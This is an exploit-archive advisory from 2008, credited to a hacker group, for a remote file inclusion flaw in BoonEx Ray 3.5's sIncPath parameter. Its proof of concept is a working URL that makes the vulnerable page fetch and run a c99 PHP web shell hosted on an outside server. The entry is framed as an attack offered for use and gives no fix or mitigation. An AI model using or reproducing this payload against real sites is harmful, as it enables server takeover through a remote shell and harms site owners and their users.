BoonEx Ray 3.5 (sIncPath) Remote File Inclusion Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : BoonEx Ray 3.5 (sIncPath) Remote File Inclusion Vulnerability
# Published : 2008-07-08
# Author : RoMaNcYxHaCkEr
# Previous Title : Mole Group Last Minute Script <= 4.0 Remote SQL Injection Vulnerability
# Next Title : SmartPPC Pay Per Click Script (idDirectory) Blind SQL Injection Vuln

# Name Of Script : Ray

# Version : 3.5

# Download From : http://get.boonex.com/Ray-v.3.5-Suite-Free

# Found By : RoMaNcYxHaCkEr [ RoMaNTiC-TeaM ]

# My Home Page : WwW.4RxH.CoM [ We Will Be Back Soon ] & Tryag.cc/cc [ Member From Tryag Forum ]

# Type Of Exploit : RFI

# POC : 

http://WwW.4RxH.CoM/ray.3.5/modules/global/inc/content.inc.php?sIncPath=http://rxh.freehostia.com/shells/c99in.txt?

# Greet To : Tryag TeaM ,Injector TeaM ,Unknown Hacker , aLwHeD

# Note : No One Perfect  :) 

# rXh

# bEST wISHES

# www.Syue.com [2008-07-08]